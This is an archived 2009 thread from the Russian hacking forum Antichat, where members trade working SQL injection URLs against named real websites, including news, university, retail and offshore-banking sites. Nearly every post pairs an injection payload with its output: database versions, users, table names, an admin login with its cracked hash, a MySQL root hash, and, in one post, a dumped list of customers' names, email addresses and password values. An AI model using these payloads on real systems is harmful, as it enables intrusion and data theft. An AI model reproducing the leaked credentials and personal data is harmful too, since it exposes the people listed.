ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
22.04.2009, 00:13
|
|
Участник форума
Регистрация: 26.11.2008
Сообщений: 158
Провел на форуме:
2816163
Репутация:
158
|
|
Театральные новые известия(pr6)
Код:
http://teatr.newizv.ru/news/?IDNews=-1+union+select+1,database(),table_name,4,5,6,7,8,9,11,12--&date=2008-07-01
user() - u10605@10.10.12.75
database() - u10605
version() - 5.0.45-log
База данных одна с главным доменом newizv.ru (тиц-12к pr-7)
Интересные таблы
Код:
ReklamaUsers
rgn_users
users
users_
prupal_access
еще есть форум и должна быть неплохая база подписчиков 
|
|
|
22.04.2009, 09:35
|
|
Новичок
Регистрация: 31.01.2009
Сообщений: 22
Провел на форуме:
451572
Репутация:
34
|
|
math.ecnu.edu.cn pr 6
Код:
http://math.ecnu.edu.cn/~hkliu/intro.html?id=-23%20union%20select%201,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4--
5.0.45:faculty:root@localhost
http://math.ecnu.edu.cn/~hkliu/intro.html?id=-23%20union%20select%201,file_priv,concat(user,0x3a,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4%20from%20mysql.user--
root:07ffadcc61d6408b file_priv - Y
|
|
|
|
22.04.2009, 11:32
|
|
Новичок
Регистрация: 14.03.2009
Сообщений: 4
Провел на форуме:
22048
Репутация:
6
|
|
http://www.konsalting.tv/content.php?r=-29+union+select+1,concat(version(),0x3a,user(),0x3 a,database()),3%20--
4.0.26-log:Uwww3947S@localhost:udb3947
http://www.antgroup.kz/eng/index.php?p=-1+union+select+1,concat(version(),0x3a,database(), 0x3a,user()),3,4,5,6,7%20--
4.1.25:antbase_eng:antbase@localhost
Последний раз редактировалось lalala23; 22.04.2009 в 13:30..
|
|
|
|
22.04.2009, 14:54
|
|
Познающий
Регистрация: 30.01.2009
Сообщений: 64
Провел на форуме:
550208
Репутация:
94
|
|
Скуля на www.relaytoday.com
Уязвимый скрипт(9 полей)
http://www.relaytoday.com/admin/previewnewsletter.php?ID=2
Список всех таблиц базы данных.
http://www.relaytoday.com/admin/previewnewsletter.php?ID=-2+union+select+1,2,table_name,4,5,6,7,8,9+from+inf ormation_schema.tables+--+
Список полей таблицы users
http://www.relaytoday.com/admin/previewnewsletter.php?ID=-2+union+select+1,2,column_name,4,5,6,7,8,9+from+in formation_schema.columns+where+table_name=0x757365 7273+--+
Логин/пароль
http://www.relaytoday.com/admin/previewnewsletter.php?ID=-2+union+select+1,2,concat_ws(0x3a,username,passwor d,admin),4,5,6,7,8,9+from+users+--+
Сводка по системе
Версия БД: 5.0.67-log
пользователь: wkhorse_1@localhost
Имя базы данных: wkhorse_relaytoday
ОС: apple-darwin9.0
Папка мускула: /var/mysql/
Админка
http://www.relaytoday.com/admin/
Доступа к mysql.user нет. Прав на чтение файла нет.
|
|
|
|
22.04.2009, 15:56
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766
Репутация:
317
|
|
<<Антивирусная школа - Новый источник IT знаний>> (:
Код:
http://av-school.ru/index.php?dn=blogs&to=comment&id=9999'+Union+sElecT+concat_ws(0x2a3a2a,%27%22%3E%3Ch1%3E%27,version(),database(),user(),@@version_compile_os)--+&mp
*:*5.1.11-beta*:*kav_system*:*kavsystem@localhost*:*portbld-freebsd6.2"
--------
Powered By Danneo RCMS |
|
|
|
22.04.2009, 17:33
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Код:
http://www.silumin.kz/index.php?m=-259+union+select+1,2,3,version(),5,6,7,8--
Код:
http://www.football-plus.az/view_cat.php?cat=2'+and+substring(version(),1,1)=4--+
|
|
|
|
22.04.2009, 21:57
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332
Репутация:
1196
|
|
www.impact.org
Код:
http://www.impact.org/speakerprofile.php?id=-76+union+select+1,2,3,4,5,6,7,8--
version():5.0.67-community
user():impact_site@localhost
database():impact_devsite
|
|
|
|
22.04.2009, 22:44
|
|
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973
Репутация:
466
|
|
http://www.dndrocketry.us/pages.php?id=6/**/UNION/**/SELECT/**/1,2,3/**/LIMIT/**/1,1/*
Database Version: 4.1.22-standard
Database name: dndrock_store
User name: dndrock_dnd@localhost
http://www.warrenfarrell.com/pages.php?id=-52/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/*
Database Version: 4.0.25
Database name: warren
User name: warren@localhost
http://www.buenachamba.com/pages.php?id=-20%27+union+select+1,user()/*
Database Version: 5.0.22
Database name: edemodb02
User name: edemouser02@localhost
pass к adminarea
mysql хеш:5f02164e65082b3e
Последний раз редактировалось Rubaka; 22.04.2009 в 23:57..
Причина: +
|
|
|
|
23.04.2009, 00:13
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740
Репутация:
912
|
|
http://www.ideaborn.com/detalle.php?id=-112+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
Database Version: 5.0.67-userstats-log
Database name: ideaborn_db
User name: ideaborn@ned.dreamhost.com
Login: admin
Pass: 81dc9bdb52d04dc20036dbd8313ed055 : 1234
http://jobgorod.ru/comment.php?ID=1-1+union+select+1,2,3,4,5--
Database Version: 4.1.22-log
Database name: jobgoro9_pokebase
User name: jobgoro9_@localhost
email: pass
http://jobgorod.ru/comment.php?ID=1-1+union+select+1,2,3,pass,concat_ws(0x3a,email)+fr om+users--
http://www.tvlab.com.ua/news/?id=-1+union+select+1,2,3,4--
Database Version: 5.0.51a
Database name: tvlab
User name: root@localhost
Шоп Багаж
http://bagazh-club.com.ua/index.php?m=06&id=-1+union+select+1,2,3,4,5,6--
Database Version: 5.0.51a-15-log
Database name: bagazhclub
User name: u_bagazhclub@localhost
Админка:
http://bagazh-club.com.ua/admin/
name: email: pswd
test:test@test.com:3213213213
test02:test02@mail.ru:2155456745
Иван Помидоров:ja-in-da-house@yandex.ru:654654654654
Федор Двинятин:test@mail.ru:384188998461
Сапармурат Ниязов:test@intechcentr.net:384188998461
123:ajegulsky@aaa.com:444586395834
Федор Иванов:abc@mail.ru:392703942157
Бла Бла:bla@mail.ru:271963550274
Людмила:mvadim@pisem.net:728109118270
Вадим:mvc@pur.ru:199490154267
Дмитрий:dimitriy_7@mail.ru:532843683176
Павел:arn_k@fromru.com:886098478852
Никита:nik-13-92@mail.ru:660344924172
Алла:allsolla@mail.ru:999999992222
Олег:Lichne@gmail.com:100509603544
алексей:alex_dem2008@mail.ru:335210418217
Инна:tebochka@ukr.net:614732119521
Последний раз редактировалось .:[melkiy]:.; 23.04.2009 в 00:31..
|
|
|
|
23.04.2009, 04:48
|
|
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988
Репутация:
739
|
|
Offshore Banking|NCB Cayman Limited
Microsoft Access
http://ncbcayman.com/services.asp?service=1+union+select+1,2,3,4,5,6,7, 8,9,10,11+from+news
Доступа к MSysObjects как и к другим системным таблицам нету.Стоит админка,но её таблицу юзеров не подобрал.
Какой-то сайт граффити
http://workground.net/news9112008'+and+ascii(substring(user(),1,1))=109+--+.html
ИТД
->user() = master@localhost
http://workground.net/news9112008'+and+ascii(substring((select+1+from+ad min),1,1))=49+--+.html
таблица admin колонки login,pdw
в итоге
Админка:
http://workground.net/admin/
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1238223){kind=avatar}
Похожие темы
Линейный вид
